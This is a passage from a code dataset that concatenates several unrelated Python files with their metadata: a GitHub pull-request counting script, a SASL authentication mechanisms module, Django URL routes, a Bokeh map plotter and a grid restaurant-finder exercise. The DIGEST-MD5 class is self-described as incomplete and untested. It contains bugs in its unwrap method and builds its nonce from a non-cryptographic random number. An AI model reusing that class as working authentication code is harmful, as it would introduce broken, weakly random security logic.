os import path\nfrom GHLogin import Login\nfrom textblob import TextBlob\n\nghe = False\nuser = input(\"Please enter your username\\n>\")\ntoken = getpass(\"please enter your P.A.T. for authentication\\n>\")\nreqs_max = 5000\norg_search = False\nuser_search = False\npub_search = True\n\nif ghe:\n\tlogin = Login(user, token)\n\tgh = login.authenticate_ghe()\nelse:\n\tlogin = Login(user, token)\n\tgh = login.authenticate()\n\ndef get_org():\n\tfor orgs in gh.iter_orgs():\n\t\t#Specify an org at a time. You'll need to query the API to get the org ID\n\t\torg = [orgs for orgs in gh.iter_orgs() if orgs.id == 9919]\n\treturn org\n\ndef get_repos():\n\tif org_search:\n\t\tfor orgs in get_org():\n\t\t\t#Specify one repository at a time. 
You'll need to query the API to get the ID of the repoistory\n\t\t\trepos = [repos for repos in orgs.iter_repos() if repos.id == 24772020]\n\t\treturn repos\n\telif user_search:\n\t\trepo = [r.refresh() for r in gh.iter_user_repos(user) if r.id == 68479364]\n\t\treturn repo\n\telse:\n\t\trepo = [r.refresh() for r in gh.iter_user_repos('angular') if r.name == 'angular']\n\t\treturn repo\n\n\ndef get_prs():\n\tpulls = []\n\tfor repo in get_repos():\n\t\tpr = repo.iter_pulls(state='all', number=100)\n\t\tpr.refresh()\n\t\tfor prs in pr:\n\t\t\tpulls.append(prs)\n\treturn pulls\n\n\ndef check_pr():\n\trepo_contrib = 0\n\trepo_maintain = 0\n\tnet_eq = 0\n\tfor pulls in get_prs():\n\t\t#file_list\n\t\tfn = []\n\t\tpulls = pulls.refresh()\n\t\tfiles = pulls.iter_files()\n\t\tfor PullFile in files:\n\t\t\tfname = PullFile.filename.split(\".\")[1]\n\t\t\tif fname == \"md\":\n\t\t\t\trepo_maintain += 1\n\t\t\telif fname == \"txt\":\n\t\t\t\trepo_maintain += 1\n\t\t\telse:\n\t\t\t\trepo_contrib += 1\n\treturn \"For the last 100 PRs, there were the following number of contributions: \", repo_contrib, repo_maintain\n\ndef check_repos():\n\trepo = get_repos()\n\tassignee_dict = {}\n\tfor r in repo:\n\t\tissues = r.iter_issues(number=100, state='open')\n\t\tfor i in issues:\n\t\t\tassignee = str(i.assignee)\n\t\t\tif not assignee in assignee_dict:\n\t\t\t\tassignee_dict[assignee] = 1\n\t\t\telse:\n\t\t\t\tassignee_dict[assignee] += 1\n\n\n\n\tfor k, v in assignee_dict.items():\n\t\tprint(k, v)\n\n\n\n\nprint(check_repos())","sub_path":"good_pr.py","file_name":"good_pr.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358248962","text":"import base64\nimport hashlib\nimport hmac\nimport random\nimport struct\nimport sys\n\nfrom ctypes import create_string_buffer\nfrom puresasl import SASLError, SASLProtocolException\nfrom puresasl.util import bytes, num_to_bytes, bytes_to_num, 
quote\n\ntry:\n import kerberos\n _have_kerberos = True\nexcept ImportError:\n _have_kerberos = False\n\n\nclass Mechanism(object):\n \"\"\"\n The base class for all mechanisms.\n \"\"\"\n\n name = None\n \"\"\" The IANA registered name for the mechanism. \"\"\"\n\n score = 0\n \"\"\" A relative security score where higher scores correspond\n to more secure mechanisms. \"\"\"\n\n complete = False\n \"\"\" Set to True when SASL negotiation has completed succesfully. \"\"\"\n\n has_initial_response = False\n\n allows_anonymous = True\n \"\"\" True if the mechanism allows for anonymous logins. \"\"\"\n\n uses_plaintext = True\n \"\"\" True if the mechanism transmits sensitive information in plaintext. \"\"\"\n\n active_safe = False\n \"\"\" True if the mechanism is safe against active attacks. \"\"\"\n\n dictionary_safe = False\n \"\"\" True if the mechanism is safe against passive dictionary attacks. \"\"\"\n\n def __init__(self, sasl):\n self.sasl = sasl\n\n def process(self, challenge=None):\n \"\"\"\n Process a challenge request and return the response.\n\n :param challenge: A challenge issued by the server that\n must be answered for authentication.\n \"\"\"\n raise NotImplementedError()\n\n def wrap(self, outgoing):\n \"\"\"\n Wrap an outgoing message intended for the SASL server. Depending\n on the negotiated quality of protection, this may result in the\n message being signed, encrypted, or left unaltered.\n \"\"\"\n raise NotImplementedError()\n\n def unwrap(self, incoming):\n \"\"\"\n Unwrap a message from the SASL server. Depending on the negotiated\n quality of protection, this may check a signature, decrypt the message,\n or leave the message unaltered.\n \"\"\"\n raise NotImplementedError()\n\n def dispose(self):\n \"\"\"\n Clear all sensitive data, such as passwords.\n \"\"\"\n pass\n\n def _fetch_properties(self, *properties):\n \"\"\"\n Ensure this mechanism has the needed properties. 
If they haven't\n been set yet, the registered callback function will be called for\n each property to retrieve a value.\n \"\"\"\n needed = [p for p in properties if getattr(self, p, None) is None]\n if needed and not self.sasl.callback:\n raise SASLError('The following properties are required, but a '\n 'callback has not been set: %s' % ', '.join(needed))\n\n for prop in needed:\n setattr(self, prop, self.sasl.callback(prop))\n\n def _pick_qop(self, server_offered_qops):\n \"\"\"\n Choose a quality of protection based on the user's requirements and\n what the server supports.\n \"\"\"\n available_qops = set(self.sasl.qops) & set(server_offered_qops)\n if not available_qops:\n raise SASLProtocolException(\"Your requested quality of \"\n \"protection is one of (%s), but the server is only \"\n \"offering (%s)\" %\n (', '.join(self.sasl.qops), ', '.join(server_offered_qops)))\n else:\n self.qops = available_qops\n for qop in ('auth-conf', 'auth-int', 'auth'):\n if qop in self.qops:\n self.qop = qop\n break\n\n\nclass AnonymousMechanism(Mechanism):\n \"\"\"\n An anonymous user login mechanism.\n \"\"\"\n name = 'ANONYMOUS'\n score = 0\n\n uses_plaintext = False\n\n def process(self, challenge=None):\n self.complete = True\n return b'Anonymous, None'\n\n\nclass PlainMechanism(Mechanism):\n \"\"\"\n A plaintext user/password based mechanism.\n \"\"\"\n name = 'PLAIN'\n score = 1\n\n allows_anonymous = False\n\n def wrap(self, outgoing):\n return outgoing\n\n def unwrap(self, incoming):\n return incoming\n\n def __init__(self, sasl, username=None, password=None, identity='', **props):\n Mechanism.__init__(self, sasl)\n self.identity = identity\n self.username = username\n self.password = password\n\n def process(self, challenge=None):\n self._fetch_properties('username', 'password')\n self.complete = True\n return bytes(self.identity) + b'\\x00' + bytes(self.username) + b'\\x00' + bytes(self.password)\n\n def dispose(self):\n self.password = None\n\n\nclass 
CramMD5Mechanism(PlainMechanism):\n name = \"CRAM-MD5\"\n score = 20\n\n allows_anonymous = False\n uses_plaintext = False\n\n def __init__(self, sasl, username=None, password=None, **props):\n Mechanism.__init__(self, sasl)\n self.username = username\n self.password = password\n\n def process(self, challenge=None):\n if challenge is None:\n return None\n\n self._fetch_properties('username', 'password')\n mac = hmac.HMAC(key=bytes(self.password), digestmod=hashlib.md5)\n mac.update(challenge)\n return bytes(self.username) + b' ' + bytes(mac.hexdigest())\n\n def dispose(self):\n self.password = None\n\n\n# TODO: incomplete, not tested\nclass DigestMD5Mechanism(Mechanism):\n\n name = \"DIGEST-MD5\"\n score = 30\n\n allows_anonymous = False\n uses_plaintext = False\n\n enc_magic = 'Digest session key to client-to-server signing key magic'\n dec_magic = 'Digest session key to server-to-client signing key magic'\n\n def __init__(self, sasl, username=None, password=None, **props):\n Mechanism.__init__(self, sasl)\n self.username = username\n self.password = password\n\n self.qops = self.sasl.qops\n self.qop = b'auth'\n self.max_buffer = self.sasl.max_buffer\n\n self._rspauth_okay = False\n self._digest_uri = None\n self._a1 = None\n self._enc_buf = b''\n self._enc_key = None\n self._enc_seq = 0\n self._dec_buf = b''\n self._dec_key = None\n self._dec_seq = 0\n\n def dispose(self):\n self._rspauth_okay = None\n self._digest_uri = None\n self._a1 = None\n self._enc_buf = b''\n self._enc_key = None\n self._enc_seq = 0\n self._dec_buf = b''\n self._dec_key = None\n self._dec_seq = 0\n\n self.password = None\n self.key_hash = None\n self.realm = None\n self.nonce = None\n self.cnonce = None\n self.nc = 0\n\n def _MAC(self, seq, msg, key):\n \"\"\"\n \"\"\"\n mac = hmac.HMAC(key=key, digestmod=hashlib.md5)\n seqnum = num_to_bytes(seq)\n mac.update(seqnum)\n mac.update(msg)\n return mac.digest()[:10] + b'\\x00\\x01' + seqnum\n\n def wrap(self, outgoing):\n result = b''\n # 
Leave buffer space for the MAC\n mbuf = self.max_buffer - 10 - 2 - 4\n\n while outgoing:\n msg = outgoing[:mbuf]\n mac = self._MAC(self._enc_seq, msg, self._enc_key)\n self._enc_seq += 1\n msg += mac\n result += num_to_bytes(len(msg)) + msg\n outgoing = outgoing[mbuf:]\n\n return result\n\n def unwrap(self, incoming):\n \"\"\"\n \"\"\"\n incoming = b'' + incoming\n result = b''\n\n while len(incoming) > 4:\n num = bytes_to_num(incoming)\n if len(incoming) < (num + 4):\n return result\n\n mac = incoming[4:4 + num]\n incoming[4 + num:]\n msg = mac[:-16]\n\n mac_conf = self._MAC(self._dec_mac, msg, self._dec_key)\n if mac[-16:] != mac_conf:\n self._desc_sec = None\n return result\n\n self._dec_seq += 1\n result += msg\n\n return result\n\n def response(self):\n required_props = ['username']\n if not getattr(self, 'key_hash', None):\n required_props.append('password')\n self._fetch_properties(*required_props)\n\n resp = {}\n if 'auth-int' in self.qops:\n self.qop = b'auth-int'\n resp['qop'] = self.qop\n\n if getattr(self, 'realm', None) is not None:\n resp['realm'] = quote(self.realm)\n\n resp['username'] = quote(bytes(self.username))\n resp['nonce'] = quote(self.nonce)\n if self.nc == 0:\n self.cnonce = bytes('%s' % random.random())[2:]\n resp['cnonce'] = quote(self.cnonce)\n self.nc += 1\n resp['nc'] = bytes('%08x' % self.nc)\n\n self._digest_uri = bytes(self.sasl.service) + b'/' + \\\n bytes(self.sasl.host)\n resp['digest-uri'] = quote(self._digest_uri)\n\n a2 = b'AUTHENTICATE:' + self._digest_uri\n if self.qop != b'auth':\n a2 += b':00000000000000000000000000000000'\n resp['maxbuf'] = b'16777215' # 2**24-1\n resp['response'] = self.gen_hash(a2)\n return b','.join([bytes(k) + b'=' + bytes(v) for k, v in resp.items()])\n\n def parse_challenge(self, challenge):\n ret = {}\n var = b''\n val = b''\n in_var = True\n in_quotes = False\n new = False\n escaped = False\n for c in challenge:\n if sys.version_info >= (3, 0):\n c = bytes([c])\n if in_var:\n if c.isspace():\n 
continue\n if c == b'=':\n in_var = False\n new = True\n else:\n var += c\n else:\n if new:\n if c == b'\"':\n in_quotes = True\n else:\n val += c\n new = False\n elif in_quotes:\n if escaped:\n escaped = False\n val += c\n else:\n if c == b'\\\\':\n escaped = True\n elif c == b'\"':\n in_quotes = False\n else:\n val += c\n else:\n if c == b',':\n if var:\n ret[var] = val\n var = b''\n val = b''\n in_var = True\n else:\n val += c\n if var:\n ret[var] = val\n return ret\n\n def gen_hash(self, a2):\n if not getattr(self, 'key_hash', None):\n key_hash = hashlib.md5()\n user = bytes(self.username)\n password = bytes(self.password)\n realm = bytes(self.realm)\n kh = user + b':' + realm + b':' + password\n key_hash.update(kh)\n self.key_hash = key_hash.digest()\n\n a1 = hashlib.md5(self.key_hash)\n a1h = b':' + self.nonce + b':' + self.cnonce\n a1.update(a1h)\n response = hashlib.md5()\n self._a1 = a1.digest()\n rv = bytes(a1.hexdigest().lower())\n rv += b':' + self.nonce\n rv += b':' + bytes('%08x' % self.nc)\n rv += b':' + self.cnonce\n rv += b':' + self.qop\n rv += b':' + bytes(hashlib.md5(a2).hexdigest().lower())\n response.update(rv)\n return bytes(response.hexdigest().lower())\n\n def authenticate_server(self, cmp_hash):\n a2 = b':' + self._digest_uri\n if self.qop != b'auth':\n a2 += b':00000000000000000000000000000000'\n if self.gen_hash(a2) == cmp_hash:\n self._rspauth_okay = True\n\n def process(self, challenge=None):\n if challenge is None:\n needed = ['username', 'realm', 'nonce', 'key_hash',\n 'nc', 'cnonce', 'qops']\n if all(getattr(self, p, None) is not None for p in needed):\n return self.response()\n else:\n return None\n\n challenge_dict = self.parse_challenge(challenge)\n if self.sasl.mutual_auth and b'rspauth' in challenge_dict:\n self.authenticate_server(challenge_dict[b'rspauth'])\n else:\n if b'realm' not in challenge_dict:\n self._fetch_properties('realm')\n challenge_dict[b'realm'] = self.realm\n\n for key in (b'nonce', b'realm'):\n if key in 
challenge_dict:\n setattr(self, key, challenge_dict[key])\n\n self.nc = 0\n if b'qop' in challenge_dict:\n server_offered_qops = [x.strip() for x in challenge_dict[b'qop'].split(b',')]\n else:\n server_offered_qops = [b'auth']\n self._pick_qop(server_offered_qops)\n\n if b'maxbuf' in challenge_dict:\n self.max_buffer = min(\n self.sasl.max_buffer, int(challenge_dict[b'maxbuf']))\n\n return self.response()\n\n @property\n def complete(self):\n \"\"\"\n \"\"\"\n if not self.sasl.mutual_auth:\n return True\n\n if self._rspauth_okay and self.qop == b'auth-int':\n self._enc_key = hashlib.md5(self._a1 + self.enc_magic).digest()\n self._dec_key = hashlib.md5(self._a1 + self.dec_magic).digest()\n self.encoding = True\n return self._rspauth_okay\n\n\nclass GSSAPIMechanism(Mechanism):\n name = 'GSSAPI'\n score = 100\n\n allows_anonymous = False\n uses_plaintext = False\n active_safe = True\n\n def __init__(self, sasl, principal=None, **props):\n Mechanism.__init__(self, sasl)\n self.user = None\n self._have_negotiated_details = False\n self.host = self.sasl.host\n self.service = self.sasl.service\n self.principal = principal\n self._fetch_properties('host', 'service')\n\n krb_service = b'@'.join((bytes(self.service), bytes(self.host)))\n try:\n _, self.context = kerberos.authGSSClientInit(\n service=krb_service, principal=self.principal)\n except TypeError:\n if self.principal is not None:\n raise StandardError(\"Error: kerberos library does not support principal.\")\n _, self.context = kerberos.authGSSClientInit(\n service=krb_service)\n\n def process(self, challenge=None):\n if not self._have_negotiated_details:\n kerberos.authGSSClientStep(self.context, '')\n _negotiated_details = kerberos.authGSSClientResponse(self.context)\n self._have_negotiated_details = True\n return base64.b64decode(_negotiated_details)\n\n challenge = base64.b64encode(challenge)\n if self.user is None:\n ret = kerberos.authGSSClientStep(self.context, challenge)\n if ret == 
kerberos.AUTH_GSS_COMPLETE:\n self.user = kerberos.authGSSClientUserName(self.context)\n return ''\n else:\n response = kerberos.authGSSClientResponse(self.context)\n if response:\n response = base64.b64decode(response)\n else:\n response = ''\n return response\n\n kerberos.authGSSClientUnwrap(self.context, challenge)\n data = kerberos.authGSSClientResponse(self.context)\n plaintext_data = base64.b64decode(data)\n if len(plaintext_data) != 4:\n raise SASLProtocolException(\"Bad response from server\") # todo: better message\n\n layers_supported, = struct.unpack('B', plaintext_data[0])\n server_offered_qops = []\n if 0x01 & layers_supported:\n server_offered_qops.append('auth')\n if 0x02 & layers_supported:\n server_offered_qops.append('auth-int')\n if 0x04 & layers_supported:\n server_offered_qops.append('auth-conf')\n\n self._pick_qop(server_offered_qops)\n\n max_length, = struct.unpack('!i', '\\x00' + plaintext_data[1:])\n self.max_buffer = min(self.sasl.max_buffer, max_length)\n\n \"\"\"\n Construct the reply.\n\n byte 0: the selected qop. 1==auth, 2==auth-int, 4==auth-conf\n byte 1-3: the max length for any buffer sent back and forth on\n this connection. (big endian)\n the rest of the buffer: the authorization user name in UTF-8 -\n not null terminated.\n\n So, we write the max length and authorization user name first, then\n overwrite the first byte of the buffer with the qop. 
This is ok since\n the max length is writen out in big endian.\n \"\"\"\n i = len(self.user)\n fmt = '!I' + str(i) + 's'\n outdata = create_string_buffer(4 + i)\n struct.pack_into(fmt, outdata, 0, self.max_buffer, self.user)\n\n qop = 1\n if self.qop == 'auth-int':\n qop = 2\n elif self.qop == 'auth-conf':\n qop = 4\n struct.pack_into('!B', outdata, 0, qop)\n\n encodeddata = base64.b64encode(outdata)\n\n kerberos.authGSSClientWrap(self.context, encodeddata)\n response = kerberos.authGSSClientResponse(self.context)\n self.complete = True\n return base64.b64decode(response)\n\n def wrap(self, outgoing):\n if self.qop != 'auth':\n outgoing = base64.b64encode(outgoing)\n if self.qop == 'auth-conf':\n protect = 1\n else:\n protect = 0\n kerberos.authGSSClientWrap(self.context, outgoing, None, protect)\n return base64.b64decode(kerberos.authGSSClientResponse(self.context))\n else:\n return outgoing\n\n def unwrap(self, incoming):\n if self.qop != 'auth':\n incoming = base64.b64encode(incoming)\n kerberos.authGSSClientUnwrap(self.context, incoming)\n conf = kerberos.authGSSClientResponseConf(self.context)\n if 0 == conf and self.qop == 'auth-conf':\n raise StandardError(\"Error: confidentiality requested, but not honored by the server.\")\n return base64.b64decode(kerberos.authGSSClientResponse(self.context))\n else:\n return incoming\n\n def dispose(self):\n kerberos.authGSSClientClean(self.context)\n\n\n#: Global registry mapping mechanism names to implementation classes.\nmechanisms = dict((m.name, m) for m in (\n AnonymousMechanism,\n PlainMechanism,\n CramMD5Mechanism,\n DigestMD5Mechanism))\n\nif _have_kerberos:\n mechanisms[GSSAPIMechanism.name] = GSSAPIMechanism\n","sub_path":"puresasl/mechanisms.py","file_name":"mechanisms.py","file_ext":"py","file_size_in_byte":18558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"6201797","text":"from django.conf.urls import patterns, url\r\nfrom api import 
views\r\n\r\n__author__ = 'Obi'\r\n\r\nurlpatterns = patterns('',\r\n\r\n url('^requests/$', views.queue),\r\n\r\n url('^add_to_queue', views.add_to_queue),\r\n\r\n url('^requests/order', views.request_order),\r\n\r\n url('^requests/not_sure', views.request_not_sure),\r\n\r\n url('^requests/cancel', views.request_cancel),\r\n\r\n url('^get_track/$', views.get_track),\r\n\r\n url('^add_delivery/$', views.add_delivery),\r\n\r\n url('^add_post_delivery/$', views.add_post_delivery),\r\n\r\n url('^get_preorders_count/$', views.get_orders_for_collection),\r\n)\r\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"639318085","text":"import json\n\nimport geopandas as gpd\nimport pandas as pd\nfrom bokeh.models import (\n Circle,\n GeoJSONDataSource,\n HoverTool,\n Legend,\n Patches,\n WheelZoomTool,\n CustomJS,\n)\nfrom bokeh.plotting import figure\nfrom bokeh.tile_providers import Vendors, get_provider\nfrom pyproj import Proj, transform\nfrom shapely import wkt\n\n\ndef update(PATH):\n try:\n # load metadata\n DF = pd.read_csv(PATH)\n DF = DF.dropna(subset=[\"geometry\"])\n DF[\"img_sd\"] = DF[\"img_sd\"].str.strip('\"')\n\n # create geodataframe for points with images\n geodf = to_geodf(DF)\n\n # transform map projection\n map_geodf = apply_transform(geodf)\n\n # update map\n export_map = update_map(map_geodf)\n\n return export_map\n\n except Exception as e:\n print(str(e))\n\n\ndef to_geodf(df):\n \"\"\"\n Return geodf\n \"\"\"\n\n df[\"geometry\"] = df[\"geometry\"].astype(str).apply(wkt.loads)\n\n geodf = gpd.GeoDataFrame(df, geometry=\"geometry\", crs=\"epsg:4326\")\n\n return geodf\n\n\ndef transform_proj(row):\n \"\"\"\n Transforms WGS84(epsg:4326) to WEBMERCATOR(epsg:3857)\n \"\"\"\n\n try:\n proj_in = Proj(\"epsg:4326\")\n proj_out = Proj(\"epsg:3857\")\n x1, y1 = row[\"lat\"], row[\"lng\"]\n x2, y2 = transform(proj_in, 
proj_out, x1, y1)\n # print(f\"({x1}, {y1}) to ({x2}, {y2})\")\n return pd.Series([x2, y2])\n\n except Exception as e:\n print(str(e))\n\n\ndef apply_transform(geodf):\n \"\"\"\n Convert WGS84(epsg:4326) to WEBMERCATOR(epsg:3857) coordinates\n \"\"\"\n\n # print(\"Transforming projections...\")\n geodf[[\"lat2\", \"lng2\"]] = geodf.apply(transform_proj, axis=1)\n # print(\"Done.\")\n\n geodf[\"geometry\"] = geodf[\"geometry\"].to_crs(\"epsg:3857\")\n\n # reduce columns and return final geodataframe\n\n map_geodf = geodf[[\"id\", \"title\", \"creator\", \"img_sd\", \"geometry\", \"lat2\", \"lng2\"]]\n\n return map_geodf\n\n\ndef update_map(map_geodf):\n\n # filter map_geodf\n map_geodf_img = map_geodf.copy().dropna(subset=[\"img_sd\"])\n map_geodf_noimg = map_geodf.copy()[map_geodf[\"img_sd\"].isna()]\n\n # create a geodatasource\n geosource_img = GeoJSONDataSource(geojson=map_geodf_img.to_json())\n geosource_noimg = GeoJSONDataSource(geojson=map_geodf_noimg.to_json())\n\n # Description from points\n TOOLTIPS1 = \"\"\"\n
\n \n

@id

\n

@creator

\n \n
\n \"\"\"\n TOOLTIPS2 = \"\"\"\n
\n

@id

\n

@creator

\n
\n \"\"\"\n callback_tp = CustomJS(\n code=\"\"\"\n var tooltips = document.getElementsByClassName(\"bk-tooltip\");\n for (var i = 0, len = tooltips.length; i < len; i ++) {\n tooltips[i].style.top = \"\"; \n tooltips[i].style.right = \"\";\n tooltips[i].style.bottom = \"0px\";\n tooltips[i].style.left = \"0px\";\n }\n \"\"\"\n )\n\n # Base map\n maps = figure(\n x_axis_type=\"mercator\",\n y_axis_type=\"mercator\",\n plot_width=1400,\n plot_height=900,\n toolbar_location=None,\n )\n\n tile_provider = get_provider(Vendors.CARTODBPOSITRON_RETINA)\n maps.add_tile(tile_provider)\n\n # construct points and wedges from hover\n viewcone1 = maps.patches(\n xs=\"xs\",\n ys=\"ys\",\n source=geosource_img,\n fill_color=\"white\",\n fill_alpha=0,\n line_color=None,\n hover_alpha=0.7,\n hover_fill_color=\"grey\",\n hover_line_color=\"grey\",\n )\n\n viewcone2 = maps.patches(\n xs=\"xs\",\n ys=\"ys\",\n source=geosource_noimg,\n fill_color=\"white\",\n fill_alpha=0,\n line_color=None,\n hover_alpha=0.7,\n hover_fill_color=\"grey\",\n hover_line_color=\"grey\",\n )\n\n point_noimg = maps.circle(\n x=\"lat2\",\n y=\"lng2\",\n source=geosource_noimg,\n size=7,\n fill_color=\"orange\",\n fill_alpha=0.5,\n line_color=\"dimgray\",\n )\n\n point_img = maps.circle(\n x=\"lat2\",\n y=\"lng2\",\n source=geosource_img,\n size=7,\n fill_color=\"orange\",\n fill_alpha=0.5,\n line_color=\"dimgray\",\n )\n\n # create a hovertool\n h1 = HoverTool(\n renderers=[point_img],\n tooltips=TOOLTIPS1,\n mode=\"mouse\",\n show_arrow=False,\n callback=callback_tp,\n )\n h2 = HoverTool(\n renderers=[point_noimg],\n tooltips=TOOLTIPS2,\n mode=\"mouse\",\n show_arrow=False,\n callback=callback_tp,\n )\n\n maps.add_tools(h1, h2)\n maps.toolbar.active_scroll = maps.select_one(WheelZoomTool)\n maps.xaxis.major_tick_line_color = None\n maps.xaxis.minor_tick_line_color = None\n maps.yaxis.major_tick_line_color = None\n maps.yaxis.minor_tick_line_color = None\n maps.xaxis.major_label_text_font_size = \"0pt\"\n 
maps.yaxis.major_label_text_font_size = \"0pt\"\n\n return maps\n","sub_path":"src/modules/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"514851664","text":"from math import hypot\n# Initialising the city of GRIDBOURNE\nGRIDBOURNE = []\nletter = list(map(chr, range(65, 75)))\nnumber = list(num for num in range(1, 11))\nfor i in letter:\n row = []\n for j in number:\n row.append('{}{}'.format(i, j))\n GRIDBOURNE.append(row)\n\ndef cord_of_restraunts(x, y):\n ''' Takes input x,y coordintaes of users location, finds the coordinates of\n restraunts in neighbourhood returning list float coordinates(HELPER FUNC)'''\n\n cr_rest_cord = [float((str(abs(x)))[0]), float((str(abs(y)))[0])]\n mr_rest_cord = [float((str(abs(x)))[0] + '.5'),\n float((str(abs(y)))[0] + '.5')]\n\n return [cr_rest_cord, mr_rest_cord]\n\ndef dist_rest(x, y, a, b):\n ''' Takes user location (a, b) and neighbourhood to be tested:(x, y) and\n finds user distance restraunts returning a list (HELPER FUNC)'''\n\n # Finding coordinates of the middle and corner restraunts in neighbourhood\n rest_cord = cord_of_restraunts(x, y)\n\n # Finding user location with origin as CR followed by origin as MR\n relative_xcr = a - rest_cord[0][0]\n relative_ycr = b - rest_cord[0][1]\n relative_xmr = a - rest_cord[1][0]\n relative_ymr = b - rest_cord[1][1]\n\n # Assuming CR,MR cords as origin to calculate eucl distance using hypot\n dist_cr = hypot(relative_xcr, relative_ycr)\n dist_mr = hypot(relative_xmr, relative_ymr)\n\n return [dist_cr, dist_mr]\n\ndef find_my_neighbourhood(x, y):\n ''' Takes an x and y coordinate as input to find the location of user in\n terms of neighbourhood returning a list'''\n\n # Checking row and column user is located in and assigning respectively\n y = str(abs(y))\n x = str(abs(x))\n col = (int(x[0]))\n row = (int(y[0]))\n\n return GRIDBOURNE[row][col]\n\ndef 
find_all_restaurants_in_neighbourhood(x, y):\n ''' Calls find_my_neighbourhood to check location of user and returns the 2\n restraunts in acsending alphabetical order as a list'''\n\n nhood = find_my_neighbourhood(x, y)\n nhood_rest = [nhood + 'CR', nhood + 'MR']\n\n return nhood_rest\n\ndef find_closest_restaurant_in_neighbourhood(x, y):\n ''' Takes user location (x, y) as inputs and finds the nearest\n restraunts to the user in their neighbourhood returning a list'''\n\n # Calling on dist_rest to calculate restraunt distances\n dist_cr = dist_rest(x, y, x, y)[0]\n dist_mr = dist_rest(x, y, x, y)[1]\n\n # Checking for closest restraunt\n if dist_cr == dist_mr:\n return find_all_restaurants_in_neighbourhood(x, y)\n elif dist_cr < dist_mr:\n return [(find_all_restaurants_in_neighbourhood(x, y))[0]]\n else:\n return [(find_all_restaurants_in_neighbourhood(x, y))[1]]\n\ndef find_farthest_restaurant_in_neighbourhood(x, y):\n ''' Takes user location (x, y) as inputs and finds the farthest\n restraunts to the user in their neighbourhood returning a list'''\n\n # Calling on dist_rest to calculate restraunt distances\n dist_cr = dist_rest(x, y, x, y)[0]\n dist_mr = dist_rest(x, y, x, y)[1]\n\n # Checking for closest restraunt\n if dist_cr == dist_mr:\n return find_all_restaurants_in_neighbourhood(x, y)\n elif dist_cr > dist_mr:\n return [(find_all_restaurants_in_neighbourhood(x, y))[0]]\n else:\n return [(find_all_restaurants_in_neighbourhood(x, y))[1]]\n\ndef find_closest_restaurant(x, y):\n ''' Takes user location (x, y) as inputs and finds the closest restruants\n regardless of neighbourhood returning a list'''\n\n # List of curr, right, left, up, down and diag_topright neighbourhoods\n near_hoods = [(x, y), (x+1, y), (x-1, y), (x, y+1), (x, y-1), (x+1, y+1)]\n\n # Scenario 2: location in left most column of GRIDBOURNE\n if x < 1:\n del near_hoods[2]\n\n # Scenario 2: location in right most column of GRIDBOURNE\n if x >= 9:\n del near_hoods[1]\n\n # Scenario 3: 
location in top column of GRIDBOURNE\n if y >= 9:\n del near_hoods[3]\n\n # Scenario 4: location in bottom column of GRIDBOURNE\n if y < 1:\n del near_hoods[4]\n\n # Running through list of nearby restraunts to compile list of closest\n nearest_rest = [[(0, 0), 40000, '']]\n for hood in near_hoods:\n dist_to_rest = dist_rest(hood[0], hood[1], x, y)\n if dist_to_rest[0] < nearest_rest[0][1]:\n nearest_rest = [[hood, dist_to_rest[0], 'CR']]\n elif dist_to_rest[0] == nearest_rest[0][1]:\n nearest_rest.append([hood, dist_to_rest[0], 'CR'])\n if dist_to_rest[1] < nearest_rest[0][1]:\n nearest_rest = [[hood, dist_to_rest[1], 'MR']]\n elif dist_to_rest[1] == nearest_rest[0][1]:\n nearest_rest.append([hood, dist_to_rest[1], 'MR'])\n\n # Formatting to return just neighbourhood and restraunt list\n final_list = []\n for mem in nearest_rest:\n final_list.append('{}{}'.format(find_my_neighbourhood(mem[0][0],\n mem[0][1]), mem[2]))\n\n return sorted(list(set(final_list)))\n\ndef find_closest_restaurant_on_path(list_of_stops):\n ''' Takes a list of lists with x,y coordinates and returns nearest\n restaurant along that path'''\n\n final_list = []\n for stop in list_of_stops:\n final_list.append(find_closest_restaurant(stop[0], stop[1]))\n\n return final_list\n","sub_path":"proj3.grouptypes.py","file_name":"proj3.grouptypes.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"593601116","text":"from data.user_input.project.printMessageInput import PrintMessageInput\nfrom functools import wraps\nfrom time import time\nfrom scipy.sparse import issparse\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import Qt\nimport configparser\nimport numpy as np\nimport os\nfrom scipy.spatial.transform import Rotation\n\n\n\ndef split_sequence(sequence, size):\n ''' \n This function breaks a sequence in equal sized blocks of choosen size.\n\n Parameters\n ----------\n sequence: list like 
object\n Any iterable object.\n\n size: int\n Size of the desired chunks.\n\n Returns\n -------\n out: list\n list with small chuncks with desired size.\n\n Examples\n --------\n >>> colors = [255,0,0,0,255,0,0,0,255] # a list with colors concatenated.\n >>> split_sequence(colors, 3)\n [[255,0,0], [0,255,0], [0,0,255]]\n '''\n\n subsequences = []\n for start in range(0, len(sequence), size):\n end = start + size\n subsequence = sequence[start:end]\n subsequences.append(subsequence)\n return subsequences\n\ndef slicer(iterable, argument):\n ''' \n A function to deal better with elements. \n\n Parameters\n ----------\n iterable: Iterable sequence.\n\n argument: str, int, iterable\n argument can be 'all', the index, or a sequence of indexes\n \n Yields\n ------\n out: Value according to the argument.\n\n Examples\n --------\n >>> sequence = ['a', 'b', 'c', 'd']\n >>> for i in slicer(sequence, [1,3,2]):\n print(i)\n 'b'\n 'd'\n 'c'\n >>> for i in slicer(sequence, 'all'):\n print(i)\n 'a'\n 'b'\n 'c'\n 'd'\n '''\n\n if isinstance(argument, str) and argument == 'all':\n if isinstance(iterable, dict):\n for i in iterable.values():\n yield i \n else:\n for i in iterable:\n yield i \n\n elif isinstance(argument, int):\n yield iterable[argument]\n \n elif hasattr(argument, '__iter__'):\n for i in argument:\n yield iterable[i]\n \n else:\n raise AttributeError('Argument not supported')\n\ndef timer(function):\n ''' \n A decorator to time functions.\n\n Parameters\n ----------\n function: Any function.\n\n Returns\n -------\n function: A function that does the same as input, but prints the time spent.\n\n Examples\n --------\n >>> @timer\n >>> def timeConsumingFunction(x):\n ... 
